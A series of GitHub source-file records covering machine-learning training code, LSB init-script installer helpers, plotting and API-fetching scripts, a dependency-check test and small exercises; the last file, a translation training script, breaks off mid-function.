parser.\"\"\"\n parser.add_argument('--kd-lambda', default=0., type=float, metavar='D',\n help='Value for lambda in Knowledge Distillation '\n '(ie. the weight of teacher output vs ground truth)')\n parser.add_argument('--kd-temperature', default=1., type=float, metavar='D',\n help='Temperature to be used. Temperature is used to soften the nets '\n 'output in order to increase the dark knowledge effect. A temperature '\n ' of 1 (default), is equivalent not to use the temperature.')\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n target = model.get_targets(sample, net_output).view(-1)\n\n # KD from the teacher\n if self._lambda > 0.0:\n net_output_scaled = (net_output[0] / self.temperature, net_output[1])\n lprobs = model.get_normalized_probs(net_output_scaled, log_probs=True)\n lprobs = lprobs.view(-1, lprobs.size(-1))\n teacher_idxs = sample['teacher_output'][0]\n teacher_outs = sample['teacher_output'][1]\n teacher_probs = F.softmax(teacher_outs / self.temperature, dim=-1)\n teacher_idxs = teacher_idxs.view(-1, teacher_idxs.shape[-1])\n teacher_probs = teacher_probs.view(-1, teacher_probs.shape[-1])\n\n lprobs_selected = lprobs.gather(dim=-1, index=teacher_idxs.long())\n teacher_loss = - (lprobs_selected * teacher_probs).sum(dim=-1)\n\n # Ignore paddings\n mask = target != self.padding_idx\n teacher_loss = teacher_loss * mask.type(teacher_loss.dtype)\n else:\n teacher_loss = 0.0\n\n if self._lambda < 1.0:\n lprobs = model.get_normalized_probs(net_output, log_probs=True)\n lprobs = lprobs.view(-1, lprobs.size(-1))\n truth_loss = F.nll_loss(\n lprobs, target, size_average=False, ignore_index=self.padding_idx, reduce=False)\n else:\n truth_loss = 0.0\n\n if isinstance(teacher_loss, torch.Tensor) and isinstance(truth_loss, torch.Tensor):\n assert teacher_loss.shape == truth_loss.shape\n loss = (1.0 - self._lambda) * truth_loss + self._lambda * teacher_loss\n\n sample_size = sample['target'].size(0) if self.sentence_avg else sample['ntokens']\n if reduce:\n loss = loss.sum()\n logging_output = {\n 'loss': loss.data,\n 'ntokens': sample['ntokens'],\n 'nsentences': sample['target'].size(0),\n 'sample_size': sample_size,\n }\n return loss, sample_size, logging_output\n\n @staticmethod\n def logging_outputs_can_be_summed() -> bool:\n \"\"\"\n Whether the logging outputs returned by `forward` can be summed\n across workers prior to calling `reduce_metrics`. Setting this\n to True will improves distributed training speed.\n \"\"\"\n return True\n\n @classmethod\n def reduce_metrics(cls, logging_outputs):\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss_sum = utils.item(sum(log.get('loss', 0) for log in logging_outputs))\n ntokens = utils.item(sum(log.get('ntokens', 0) for log in logging_outputs))\n sample_size = utils.item(sum(log.get('sample_size', 0) for log in logging_outputs))\n\n metrics.log_scalar('loss', loss_sum / sample_size / math.log(2), sample_size, round=3)\n if sample_size != ntokens:\n metrics.log_scalar('nll_loss', loss_sum / ntokens / math.log(2), ntokens, round=3)\n metrics.log_derived('ppl', lambda meters: utils.get_perplexity(meters['nll_loss'].avg))\n else:\n metrics.log_derived('ppl', lambda meters: utils.get_perplexity(meters['loss'].avg))\n","repo_name":"mgaido91/FBK-fairseq-ST","sub_path":"fairseq/criterions/knowledge_distillation.py","file_name":"knowledge_distillation.py","file_ext":"py","file_size_in_byte":5008,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"44"} +{"seq_id":"22691506885","text":"# Begin lsbtools/__init__.py\n\nimport glob, itertools, os, re, sys\nfrom io import StringIO\n\n# Treat LSB headers just like RFC 2822 (email headers)\n# Derived from RFC822Parser from Debain initdutils.py\nclass ParseHeaders(dict):\n \"A dictionary-like object.\"\n __linere = re.compile(r'([^:]+):\\s*(.*)$')\n def __init__(self, fileob=None, strob=None, startcol=0, basedict=None):\n if fileob is None and strob is None:\n raise ValueError('need a file or string')\n if not basedict:\n basedict = {}\n super(ParseHeaders, self).__init__(basedict)\n if not fileob:\n fileob = StringIO(strob)\n key = None\n for line in fileob:\n if startcol:\n line = line[startcol:]\n if not line.strip():\n continue\n # Continuation line\n if line[0].isspace():\n if not key:\n continue\n self[key] += '\\n' + line.strip()\n continue\n m = self.__linere.match(line)\n if not m:\n # Not a valid header\n continue\n key, value = m.groups()\n self[key] = value.strip()\n\n\nbeginre = re.compile(re.escape('### BEGIN INIT INFO'))\nendre = re.compile(re.escape('### END INIT INFO'))\n\n# Derived from scan_intifile() from Debian initdutils.py\ndef scan_headers(initfile, debug):\n headerlines = ''\n scanning = False\n for line in open(initfile):\n line = line.rstrip()\n if beginre.match(line):\n scanning = True\n continue\n elif scanning and endre.match(line):\n scanning = False\n continue\n elif not scanning:\n continue\n if line.startswith('# '):\n headerlines += line[2:] + '\\n'\n elif line.startswith('#\\t'):\n headerlines += line[1:] + '\\n'\n inheaders = ParseHeaders(strob=headerlines)\n headers = {}\n for header, body in inheaders.items():\n # Ignore empty headers\n if not body.strip():\n continue\n if header in ('Provides',\n 'Required-Start', 'Required-Stop',\n 'Should-Start', 'Should-Stop',\n 'Default-Start', 'Default-Stop'):\n headers[header] = body.split()\n else:\n headers[header] = body\n return headers\n\n\ndef find_index(listname, scriptname):\n index = 0\n if scriptname == \"98\":\n return (len(listname) - 1)\n if scriptname == \"01\":\n return 0\n while index < len(listname):\n if listname[index][0] == scriptname:\n return index\n index += 1\n # If we didn't find it, return a predictable number\n return 1000\n\n\ndef find_initd_dir():\n if os.path.exists(\"/etc/init.d\"):\n if os.path.islink(\"/etc/init.d\"):\n initdDir = os.path.realpath(\"/etc/init.d\")\n else:\n initdDir = \"/etc/init.d\"\n elif os.path.exists(\"/etc/rc.d/init.d\"):\n initdDir = \"/etc/rc.d/init.d\"\n else:\n print(\"Unable to locate init.d directory! Exiting...\", file=sys.stderr)\n sys.exit(2)\n return initdDir\n\n\ndef find_rc_base_dir():\n if os.path.exists(\"/etc/rc.d\"):\n if os.path.islink(\"/etc/rc.d\"):\n rcdDir = os.path.realpath(\"/etc/rc.d\")\n else:\n rcdDir = \"/etc/rc.d\"\n else:\n print(\"Unable to locate rc.d directory! Exiting...\", file=sys.stderr)\n sys.exit(3)\n return rcdDir\n\n\ndef find_font_dir():\n lsb_fontdir = \"/usr/share/fonts/lsb\"\n if not os.path.exists(lsb_fontdir):\n os.mkdir(lsb_fontdir)\n os.chmod(lsb_fondir, 0o755)\n return lsb_fontdir\n\n\ndef get_matrix(initdDir, debug):\n matrix = []\n for filename in os.listdir(initdDir):\n headers = scan_headers(os.path.join(initdDir, filename), debug)\n provides = headers.get('Provides', [])\n reqstart = headers.get('Required-Start', [])\n reqstop = headers.get('Required-Stop', [])\n shouldstart = headers.get('Should-Start', [])\n shouldstop = headers.get('Should-Stop', [])\n defstart = headers.get('Default-Start', [])\n defstop = headers.get('Default-Stop', [])\n if filename != \"template\" and filename != \"rc\":\n matrix.append([filename, provides, reqstart, reqstop, shouldstart, shouldstop, defstart, defstop,])\n return matrix\n\ndef get_prog_ver(strprogram):\n progver = strprogram + \" \" + \" (LSB-Tools-0.10)\"\n return progver\n\ndef install_font(argobject):\n fontDir = lsbtools.find_font_dir()\n aobject = os.path.basename(argsobject).strip(\" \")\n fontfile = os.path.join(fontDir, aobject)\n if os.path.exists(fontfile):\n if check == 1:\n print(fontfile, \"exists in filesystem.\")\n sys.exit(0)\n elif remove == 1:\n os.remove(fontfile)\n print(fontfile, \"successfully removed.\")\n sys.exit(0)\n else:\n print(\"Error:\", fontfile, \"already exists in filesystem. Exiting...\", file=sys.stderr)\n sys.exit(1)\n else:\n if check == 1:\n print(fontfile, \"does not exist in filesystem.\")\n sys.exit(1)\n elif remove == 1:\n print(fontfile, \"does not exist in filesystem. No need to remove.\")\n sys.exit(0)\n else:\n copyfile(argsobject, fontDir)\n os.chmod(fontfile, 0o644)\n sys.exit(0)\n\ndef install_init(argobject):\n initdDir = lsbtools.find_initd_dir()\n aobject = os.path.basename(argsobject).strip(\" \")\n initfile = os.path.join(initdDir, aobject)\n if os.path.exists(initfile):\n if check == 1:\n print(initfile, \"exists in filesystem.\")\n sys.exit(0)\n elif remove == 1:\n os.remove(initfile)\n print(initfile, \"successfully removed.\")\n sys.exit(0)\n else:\n print(\"Error:\", initfile, \"already exists in filesystem. Exiting...\", file=sys.stderr)\n sys.exit(1)\n else:\n if check == 1:\n print(initfile, \"does not exist in filesystem.\")\n sys.exit(1)\n elif remove == 1:\n print(initfile, \"does not exist in filesystem. No need to remove.\")\n sys.exit(0)\n else:\n copyfile(argsobject, initdDir)\n os.chmod(initfile, 0o644)\n sys.exit(0)\n\ndef install_profile(argobject):\n profileDir = \"/etc/profile.d\"\n aobject = os.path.basename(argsobject).strip(\" \")\n profilefile = os.path.join(profileDir, aobject)\n if os.path.exists(profilefile):\n if check == 1:\n print(profilefile, \"exists in filesystem.\")\n sys.exit(0)\n elif remove == 1:\n os.remove(profilefile)\n print(initfile, \"successfully removed.\")\n sys.exit(0)\n else:\n print(\"Error:\", profilefile, \"already exists in filesystem. Exiting...\", file=sys.stderr)\n sys.exit(1)\n else:\n if check == 1:\n print(profilefile, \"does not exist in filesystem.\")\n sys.exit(1)\n elif remove == 1:\n print(profilefile, \"does not exist in filesystem. No need to remove.\")\n sys.exit(0)\n else:\n copyfile(argsobject, profileDir)\n os.chmod(profilefile, 0o644)\n sys.exit(0)\n\ndef install_service(argobject):\n portproto = argobject[0].split(\"/\")\n if len(portproto) != 2:\n print(\"Invalid syntax! The first argument of type service must be in port/proto\\nformat, followed by service name and any aliases. Ex: 80/tcp http webserver\")\n portservice = argobject[1]\n if len(argobject) > 2:\n servalias = ''\n count=2\n while count < len(argobject):\n servalias = servalias + argobject[count] + ' '\n count += 1\n if check == 1:\n try:\n portcheck = socket.getservbyname(portservice, portproto[1])\n except OSError:\n portcheck = 'error'\n try:\n namecheck = socket.getservbyport(int(portproto[0]), portproto[1])\n except OSError:\n namecheck = 'error'\n if portcheck == portproto[0] and namecheck == portservice:\n print(\"Service\", portservice, \"with port\", portproto[0], \"on protocol\", portproto[1], \"exists.\")\n sys.exit(0)\n if remove == 1:\n print(\"Service removal is not currently supported. Exiting...\", file=sys.stderr)\n sys.exit(1)\n\n if servalias == '':\n print(\"Adding service\", portservice, \"with port\", portproto[0], \"on protocol\", portproto[1])\n else:\n print(\"Adding service\", portservice, \"with port\", portproto[0], \"on protocol\", portproto[1], \"with aliases:\", servalias)\n try:\n nameservice = socket.getservbyport(int(portproto[0]), portproto[1])\n except OSError:\n nameservice = 'error'\n if portservice != nameservice:\n namesp = 25 - len(portservice) - len(argobject[0])\n fmtstr = portservice\n count = 0\n while count < namesp:\n fmtstr = fmtstr + ' '\n count += 1\n fmtstr = fmtstr + argobject[0]\n servicesfile=open(\"/etc/services\", \"a\")\n servicesfile.write(\"%s\\r\\n\", fmtstr)\n servicesfile.close()\n sys.exit(0)\n else:\n print(\"Service\", portservice, \"with port\", portproto[0], \"on protocol\", portproto[1], \"exists.\")\n sys.exit(0)\n\ndef install_inet(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_crontab(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_package(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_menu(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_ldconfig(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\ndef install_man(argsobject):\n print(\"Not implemented...\")\n sys.exit(0)\n\n","repo_name":"lfs-book/LSB-Tools","sub_path":"lsbtools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71914000133","text":"from KratosMultiphysics import *\nimport KratosMultiphysics.PfemFluidDynamicsApplication as PfemFluid\nfrom KratosMultiphysics import gid_output_process\n\nclass GiDOutputProcess(gid_output_process.GiDOutputProcess):\n\n def __init__(self, model_part, file_name, param=None):\n super().__init__(model_part, file_name, param)\n self.do_first_output = True\n\n def _InitializeGiDIO(self,gidpost_flags,param):\n '''Initialize GidIO objects (for volume and cut outputs) and related data.'''\n self.volume_file_name = self.base_file_name\n self.cut_file_name = self.volume_file_name+\"_cuts\"\n self.post_mode = self.__get_gidpost_flag(param, \"GiDPostMode\", self.__post_mode)\n self.write_deformed_mesh = self.__get_gidpost_flag(param, \"WriteDeformedMeshFlag\", self.__write_deformed_mesh)\n self.write_conditions = self.__get_gidpost_flag(param,\"WriteConditionsFlag\",self.__write_conditions)\n self.multifile_flag = self.__get_gidpost_flag(param,\"MultiFileFlag\", self.__multi_file_flag)\n\n if self.body_output or self.node_output:\n self.body_io = PfemFluid.PfemFluidGidIO( self.volume_file_name,\n self.post_mode,\n self.multifile_flag,\n self.write_deformed_mesh,\n self.write_conditions)\n\n if self.skin_output or self.num_planes > 0:\n self.cut_io = PfemFluid.PfemFluidGidIO(self.cut_file_name,\n self.post_mode,\n self.multifile_flag,\n self.write_deformed_mesh,\n WriteConditionsFlag.WriteConditionsOnly) # Cuts are conditions, so we always print conditions in the cut ModelPart\n\n def IsOutputStep(self):\n\n if self.do_first_output:\n self.do_first_output = False\n return True\n else:\n return self.controller.Evaluate()\n\n def PrintOutput(self):\n if self.point_output_process is not None:\n self.point_output_process.ExecuteBeforeOutputStep()\n\n # Print the output\n time = self.__get_pretty_time(self.model_part.ProcessInfo[TIME])\n # self.printed_step_count += 1\n self.model_part.ProcessInfo[PRINTED_STEP] = self.printed_step_count\n\n tolerance=0.0000000000001\n if (time angle brackets\n# < bra > ket in greek\n\n# Creates a list and then prints a specific item from the list\nlistvar1 = [\"meat\", \"veg\", \"cake\", \"beer for the weekend\", 20]\n# 0 1 2 3 4\n# -4 -3 -2 -1 0\n\nlistvar1.append(\"pies\")\nlistvar1.insert(1, \"pies\")\nlistvar1.remove(\"veg\")\nlistvar1.count(\"veg\")\n#counts how many things are in the list be careful with the count function\nprint(len(listvar1))\nprint(listvar1)\n\n\ncool_cows = [\"Winnie the moo\", \"Moolan\", \"Milkshake\", \"Mooana\"]\ncool_sheep = [\"Baaaart\", \"Baaaarnaby\"]\ncool_pigs = [\"Chris P. Bacon\", \"Hamlet\", \"Hogwarts\"]\n\ncool_animals = [cool_cows, cool_sheep, cool_pigs]\n\nprint(cool_animals[1][1])\n\nlistvar1.append(\"pies\")\n","repo_name":"PhantomW0rm/Python-Projects","sub_path":"lists-collections.py","file_name":"lists-collections.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37456679992","text":"def optimize_prompt(prompt):\n filler_words = [\"just\", \"really\", \"very\", \"actually\"] # List of filler words\n\n # Remove filler words from the prompt\n optimized_prompt = ' '.join(word for word in prompt.split() if word.lower() not in filler_words)\n\n # Simplify sentence structures\n sentences = optimized_prompt.split(\".\")\n simplified_sentences = [s.strip() for s in sentences if s.strip()]\n optimized_prompt = \". \".join(simplified_sentences)\n\n # Use pronouns\n pronoun_mapping = {\"programming languages\": \"them\", \"section\": \"it\"}\n for key, value in pronoun_mapping.items():\n optimized_prompt = optimized_prompt.replace(key, value)\n\n return optimized_prompt\n\n# Example usage\nprompt = \"write a code in python to make a pie chart of given input of programming languages with their popularity and have section with distinct color and also make one section pop out\"\noptimized_prompt = optimize_prompt(prompt)\nprint(optimized_prompt)\n","repo_name":"aditya1792/Prompt","sub_path":"Promt.py","file_name":"Promt.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73473743494","text":"from pathlib import Path\nimport h5py\nimport matplotlib.pyplot as plt\nimport sys\n\nfilename = Path(sys.argv[-1])\n\ndf = h5py.File(str(filename), 'r')\nt = df['scales/sim_time'][:]\n\nTE = df['tasks/Energy_x'][:,0,0,0] + df['tasks/Energy_y'][:,0,0,0] + df['tasks/Energy_z'][:,0,0,0]\nTEns = df['tasks/Enstrophy_x'][:,0,0,0] + df['tasks/Enstrophy_y'][:,0,0,0] + df['tasks/Enstrophy_z'][:,0,0,0]\n\nplt.figure(figsize=(8,16))\nplt.subplot(3,1,1)\nplt.plot(t, df['tasks/Energy_x'][:,0,0,0], label='x')\nplt.plot(t, df['tasks/Energy_y'][:,0,0,0], label='y')\nplt.plot(t, df['tasks/Energy_z'][:,0,0,0], label='z')\nplt.plot(t, TE, color='k', linewidth=2, label='total')\nplt.legend()\nplt.xlabel(\"time\")\nplt.ylabel(\"Energy\")\n\nplt.subplot(3,1,2)\nplt.plot(t, df['tasks/Nusselt'][:,0,0,0])\nplt.xlabel(\"time\")\nplt.ylabel(\"Nusselt\")\n\nplt.subplot(3,1,3)\nplt.plot(t, df['tasks/Enstrophy_x'][:,0,0,0], label='x')\nplt.plot(t, df['tasks/Enstrophy_y'][:,0,0,0], label='y')\nplt.plot(t, df['tasks/Enstrophy_z'][:,0,0,0], label='z')\nplt.plot(t, TEns, color='k', linewidth=2, label='total')\nplt.legend()\nplt.xlabel(\"time\")\nplt.ylabel(\"Enstrophy\")\n\nplt.tight_layout()\nparent = filename.parent\nplt.savefig(str(parent/\"energies.png\"), dpi=300)\n\n","repo_name":"jsoishi/wall_modes_topology","sub_path":"python/plot_timeseries.py","file_name":"plot_timeseries.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31342627494","text":"import json\nimport requests\nimport asyncio\nimport aiohttp\nimport limiter\n\ndef get_cat_fact(num):\n url='https://catfact.ninja/fact'\n print(f'Request {num} started.')\n response=requests.get(url)\n print (f'Request {num} finished. Status {response.status_code}.')\n if response.status_code==200: \n obj=json.loads(response.text)\n return obj['fact']\n else:\n raise NotImplementedError(\"A response was had a status othern than 200. Only 200 has been implemented.\")\n\ndef sync_get(url,i):\n print(f'Request {i} started.')\n response=requests.get(url)\n print (f'Request {i} finished. Status {response.status_code}.')\n\nasync def async_get(session, url,i):\n print(f'Request {i} started.')\n response=await session.get(url)\n print (f'Request {i} finished. Status {response.status}.')\n\n return response\n \nasync def get_cat_fact_async(num):\n url='https://catfact.ninja/fact'\n results=[]\n async with aiohttp.ClientSession() as session:\n \n tasks=[]\n for i in range(num):\n tasks.append(async_get(session,url,i))\n\n responses= await asyncio.gather(*tasks) \n count=0 \n for response in responses:\n status=response.status\n if status==200:\n json=await response.json()\n results.append(json['fact'])\n count+=1\n print(f'Successful count = {count}')\n \n return results\n\n\n\nasync def get_cat_fact_async_with_limit(num):\n url='https://catfact.ninja/fact'\n results=[]\n for i in range(num):\n options=limiter.RequestOptions(url,'GET',i)\n limiter.q.put(options)\n \n limiter.q.put(None) ## signal that the batch is over\n limiter.event.wait() \n responses= limiter.results.copy()\n limiter.results=[]\n limiter.event.clear()\n count=0 \n for response in responses:\n status=response.status\n if status==200:\n json=await response.json()\n results.append(json['fact'])\n count+=1\n print(f'Successful count = {count}')\n \n return results\n","repo_name":"ChristosCh00/flask_async_example","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31881230052","text":"from math import floor, ceil\n\ndef IsLeapYear(val):\n if (val % 100) == 0:\n if (val % 400) == 0:\n return True\n else:\n return False\n if (val % 4) == 0:\n return True\n\n return False\n#------------------------------------------------------\n\ndef GetMonthDay(yearVal, monthVal):\n if monthVal in [1,3,5,7,8,10,12]:\n return 31\n if monthVal in [4,6,9,11]:\n return 30\n if IsLeapYear(yearVal):\n return 29\n\n return 28\n#------------------------------------------------------\n\n# Week day from Monday to Sunday: 1 to 7\nweekDayOfFirstDay = 2\nsum_FirstDayIsSunday = 0\nfor yearNum in range(1901, 2001):\n for monthNum in range(1, 13):\n print('Year %d Month %d, weekday %d' % (yearNum, monthNum, weekDayOfFirstDay))\n if (weekDayOfFirstDay == 7):\n sum_FirstDayIsSunday += 1\n # Calculate the weekday of the first day of next month\n monthDay = GetMonthDay(yearNum, monthNum)\n weekDayOfFirstDay += monthDay % 7\n if (weekDayOfFirstDay > 7):\n weekDayOfFirstDay = weekDayOfFirstDay % 7\n\n\nprint('Total First day of a month is Sunday from 1900 to 2000 is %d' % sum_FirstDayIsSunday)","repo_name":"crusaderg/Euler-Project","sub_path":"quiz19.py","file_name":"quiz19.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"1314864879","text":"import pkg_resources\nfrom pkg_resources import DistributionNotFound, VersionConflict\n\nfrom src.utils import remove\nfrom tests.utils import wrap_test_forked\n\n\ndef get_all_requirements():\n import glob\n requirements_all = []\n reqs_http_all = []\n for req_name in ['requirements.txt'] + glob.glob('reqs_optional/req*.txt'):\n requirements1, reqs_http1 = get_requirements(req_name)\n requirements_all.extend(requirements1)\n reqs_http_all.extend(reqs_http1)\n return requirements_all, reqs_http_all\n\n\ndef get_requirements(req_file=\"requirements.txt\"):\n req_tmp_file = req_file + '.tmp.txt'\n try:\n\n reqs_http = []\n\n with open(req_file, 'rt') as f:\n contents = f.readlines()\n with open(req_tmp_file, 'wt') as g:\n for line in contents:\n if 'http://' not in line and 'https://' not in line:\n g.write(line)\n else:\n reqs_http.append(line.replace('\\n', ''))\n reqs_http = [x for x in reqs_http if x]\n print('reqs_http: %s' % reqs_http, flush=True)\n\n with open(req_tmp_file, \"rt\") as f:\n requirements = pkg_resources.parse_requirements(f.read())\n finally:\n remove(req_tmp_file)\n return requirements, reqs_http\n\n\n@wrap_test_forked\ndef test_requirements():\n \"\"\"Test that each required package is available.\"\"\"\n packages_all = []\n packages_dist = []\n packages_version = []\n packages_unkn = []\n\n requirements, reqs_http = get_all_requirements()\n\n for requirement in requirements:\n try:\n requirement = str(requirement)\n pkg_resources.require(requirement)\n except DistributionNotFound:\n packages_all.append(requirement)\n packages_dist.append(requirement)\n except VersionConflict:\n packages_all.append(requirement)\n packages_version.append(requirement)\n except pkg_resources.extern.packaging.requirements.InvalidRequirement:\n packages_all.append(requirement)\n packages_unkn.append(requirement)\n\n packages_all.extend(reqs_http)\n if packages_dist or packages_version:\n print('Missing packages: %s' % packages_dist, flush=True)\n print('Wrong version of packages: %s' % packages_version, flush=True)\n print(\"Can't determine (e.g. http) packages: %s\" % packages_unkn, flush=True)\n print('\\n\\nRUN THIS:\\n\\n', flush=True)\n print(\n 'pip uninstall peft transformers accelerate -y ; CUDA_HOME=/usr/local/cuda-11.7 pip install %s --upgrade' % str(\n ' '.join(packages_all)), flush=True)\n print('\\n\\n', flush=True)\n\n raise ValueError(packages_all)\n\n\nimport requests\nimport json\n\ntry:\n from packaging.version import parse\nexcept ImportError:\n from pip._vendor.packaging.version import parse\n\nURL_PATTERN = 'https://pypi.python.org/pypi/{package}/json'\n\n\ndef get_version(package, url_pattern=URL_PATTERN):\n \"\"\"Return version of package on pypi.python.org using json.\"\"\"\n req = requests.get(url_pattern.format(package=package))\n version = parse('0')\n if req.status_code == requests.codes.ok:\n j = json.loads(req.text.encode(req.encoding))\n releases = j.get('releases', [])\n for release in releases:\n ver = parse(release)\n if not ver.is_prerelease:\n version = max(version, ver)\n return version\n\n\n@wrap_test_forked\ndef test_what_latest_packages():\n # pip install requirements-parser\n import requirements\n import glob\n for req_name in ['requirements.txt'] + glob.glob('reqs_optional/req*.txt'):\n print(\"\\n File: %s\" % req_name, flush=True)\n with open(req_name, 'rt') as fd:\n for req in requirements.parse(fd):\n from importlib.metadata import version\n try:\n current_version = version(req.name)\n latest_version = get_version(req.name)\n if str(current_version) != str(latest_version):\n print(\"%s: %s -> %s\" % (req.name, current_version, latest_version), flush=True)\n except Exception as e:\n print(\"Exception: %s\" % str(e), flush=True)\n","repo_name":"h2oai/h2ogpt","sub_path":"tests/test_requirements.py","file_name":"test_requirements.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":8660,"dataset":"github-code","pt":"44"} +{"seq_id":"23928643262","text":"\"\"\"\nBase class and BaseError class.\n\nDefinitions for both the Base class, an abstract parent class\nfor all the other commands, as well as constant variables used\nthroughout the program, and a custom error class: BaseError.\n\nContact: jenniferhellar@gmail.com\n\nAuthors: Jennifer Hellar.\n\"\"\"\nimport os\nimport sys\n\nfrom .constants import SUPPORTED_TOOLCHAINS\n\n\nclass BaseError(Exception):\n \"\"\"Generic Exception class for handling errors.\"\"\"\n\n def __init__(self, msg):\n \"\"\"Print error message, exit program.\"\"\"\n super()\n print('ERROR: ' + str(msg))\n sys.exit(1)\n\n\nclass Base():\n \"\"\"\n Basic form of command.\n\n Creates structure for other command classes to follow by\n allowing all command classes to have access to the passed\n in arguments as well as file and toolchain validity checking\n functions.\n \"\"\"\n\n def __init__(self, options, *args, **kwargs):\n \"\"\"All commands have access to options defined by user.\"\"\"\n self.options = options\n self.args = args\n self.kwargs = kwargs\n\n def check_file_valid(self, file_path):\n \"\"\"Check if file exists and is not empty.\"\"\"\n file_name = os.path.basename(file_path)\n if not os.path.exists(file_path):\n raise BaseError('File {} does not exist'.format(file_name))\n\n if not os.path.getsize(file_path) > 0:\n raise BaseError('File {} is empty'.format(file_name))\n\n def check_toolchain_valid(self, toolchain):\n \"\"\"Check if toolchain supported.\"\"\"\n toolchain = toolchain.lower()\n input_toolchain_supported = False\n for tool in SUPPORTED_TOOLCHAINS:\n if toolchain == tool:\n input_toolchain_supported = True\n\n if input_toolchain_supported is False:\n raise BaseError('Requested toolchain {} is not supported by Hydra. Supported toolchains are: {}' \\\n .format(toolchain, ', '.join(SUPPORTED_TOOLCHAINS)))\n\n def run(self):\n \"\"\"Conceptually pure virtual function for override in child classes.\"\"\"\n raise NotImplementedError('Subclass Base and implement run!')\n","repo_name":"rvru/rvr-hydra","sub_path":"hydra/commands/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"75247421893","text":"import torch\nfrom attention import *\nfrom sklearn.model_selection import train_test_split\nimport random\nimport time\n\n# declare variables for timing\n# declare variables for timing\ntotalLinesLeft = 0\ntimePerLine = 0\ntimeLeft = timePerLine*totalLinesLeft\ntotalstarttime = time.time()\nepochstartTime = time.time()\n\ndef trainModel(m, opt, inputData, targetData):\n '''\n Input of Model, optimizer, inputData, and targetData\n Will output Model and optimizer\n Ret: (model, optimizer)\n '''\n # shuffle data\n traindata = list(zip(inputData, targetData))\n totalLen = len(inputData)\n random.shuffle(traindata)\n\n ### Update model on train\n train_loss = 0.\n train_target_words = 0\n for i, (input_words, target_words) in enumerate(progress(traindata)):\n # skip if empty\n if len(input_words) == 0 or len(target_words) == 0:\n continue\n loss = -m.logprob(input_words, target_words)\n opt.zero_grad()\n loss.backward()\n opt.step()\n train_loss += loss.item()\n train_target_words += len(target_words) # includes EOS\n if i % 100 == 0 and i != 0:\n avgTime = (time.time() - epochstartTime)/i\n timeLeftEpoch = avgTime * (totalLen-i)\n print(f' On line {i}/{totalLen}. Time left for epoch: {round(timeLeftEpoch/60, 3)} mins')\n\n print(f' train_loss={train_loss} train_ppl={math.exp(train_loss/train_target_words)}', flush=True)\n return m, opt\n\ndef validateDev(m, inputData, targetData):\n ### Validate on dev set and print out a few translations\n devdata = list(zip(inputData, targetData))\n dev_loss = 0.\n dev_ewords = 0\n for line_num, (fwords, twords) in enumerate(devdata):\n # skip if empty\n if len(fwords) == 0 or len(twords) == 0:\n continue\n dev_loss -= m.logprob(fwords, twords).item()\n dev_ewords += len(twords) # includes EOS\n if line_num < 10:\n translation = m.translate(fwords)\n print(' '.join(translation))\n\n print(f' dev_ppl={math.exp(dev_loss/dev_ewords)}', flush=True)\n print(f'Input words: {fwords} --> Output words: {translation}')\n return dev_loss\n\ndef outputPred(m, inputData):\n outputPred = []\n for words in inputData:\n try: \n translation = m.translate(words)\n except TypeError:\n print(f'Bad words: {words}')\n translation = []\n translation.append('')\n outputPred.append(translation)\n return outputPred\n\n\ndef outputTest(m, fileName, inputData, predType, dev_loss):\n '''\n Writes outputs to file\n predType is the type contained in the file, either target or foreign\n '''\n fileN = f'{fileName}-{predType}-{round(dev_loss, 3)}'\n with open(fileN, 'w') as outfile:\n for fwords in inputData:\n translation = m.translate(fwords)\n initialSent = ' '.join(fwords)\n translatedSent = ' '.join(translation)\n print(f'{initialSent} {translatedSent}', file=outfile)\n\n return\n\nif __name__ == \"__main__\":\n import argparse, sys\n \n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--dataf', dest='dataf', type=str, help='foreign language data')\n parser.add_argument('-t', '--datat', dest='datat', type=str, help='target language data')\n parser.add_argument('--initial', dest='initial', type=str, help='Initial rough translation of target language from foreign language data')\n parser.add_argument('--percentTrain', type=str, help='Percent to be used for training data (in decimal form), the remaining will be split between dev and test')\n parser.add_argument('--epochs', '-e', dest='epochs', type=int, help='Number of epochs to train per model per iteration')\n parser.add_argument('--iterations', '-i', dest='iterations', type=int, help='Number of iterations to go through')\n parser.add_argument('-o', '--outfile', dest='outfile', type=str, help='write translations to file')\n parser.add_argument('--load', type=str, help='load model from file')\n parser.add_argument('--savetf', dest='savetf', type=str, help='save target to foreign model in file')\n parser.add_argument('--saveft', dest='saveft', type=str, help='save foreign to target model in file')\n args = parser.parse_args()\n\n if args.dataf and args.initial and args.datat:\n '''\n dataf: Foreign Language data\n datat: Target language data\n initialTranslation: The rough initial translation of the foreign language into the target\n '''\n\n # Read in data\n dataf = read_mono(args.dataf)\n datat = read_mono(args.datat)\n 